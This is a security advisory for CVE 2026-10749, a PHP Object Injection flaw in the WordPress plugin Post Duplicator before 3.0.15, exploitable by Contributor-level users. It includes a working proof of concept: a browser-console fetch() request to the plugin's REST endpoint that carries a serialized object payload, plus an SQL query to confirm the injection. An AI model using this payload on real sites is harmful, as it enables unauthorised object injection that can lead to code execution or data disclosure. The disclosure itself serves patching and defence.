Post Duplicator < 3.0.15 – Contributor+ PHP Object Injection via customMetaData | CVE 2026-10749

Description

The plugin does not safely handle custom meta-data during post duplication, storing attacker-supplied serialized values without the WordPress meta API's double-serialization protection, allowing users with Contributor-level access and above to inject a PHP Object.

If a suitable POP chain is present via another installed plugin or theme, this could be leveraged for remote code execution, arbitrary file operations, or sensitive data disclosure.

Proof of Concept

Prerequisites:
- Post Duplicator <= 3.0.14 active with default settings (the `duplicate_posts` capability is granted to Contributor and above by default).
- A Contributor account.

Steps:

1. Log in as a Contributor, create a post (a draft is enough), and add a Custom Field named `poi_payload` with any value (e.g. `harmless`). Save and note the post ID (e.g. 4). The key only needs to already exist on the source post.

2. From the WordPress admin, open the browser console and duplicate the post, supplying a raw serialized PHP object string as the value for that existing meta key:

const ORIGINAL_ID = 4; // your source post ID
fetch('/wp-json/post-duplicator/v1/duplicate-post', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'X-WP-Nonce': wpApiSettings.nonce },
    body: JSON.stringify({
        original_id: ORIGINAL_ID,
        includeCustomMeta: true,
        customMetaData: [ { key: "poi_payload", value: 'O:9:"EvilClass":0:{}' } ]
    })
}).then(res => res.json()).then(data => console.log("Duplicate ID:", data.duplicate_id));

3. Verify the injection. The duplicated post stores `poi_payload` as the raw serialized string (it is NOT re-serialized as a string):

   SELECT meta_value FROM wp_postmeta WHERE meta_key='poi_payload' AND post_id=<duplicate_id>;
   -- returns: O:9:"EvilClass":0:{}

When this meta is later read via get_post_meta(), WordPress core's maybe_unserialize() instantiates the object instead of returning a string, confirming PHP Object Injection. With a suitable POP/gadget chain present on the site, this can lead to remote code execution, arbitrary file operations, or sensitive data disclosure.

Note: the value byte-length must match the declared class-name length (here `EvilClass` = 9 chars, hence `O:9:`); a mismatched length makes the string fail to unserialize.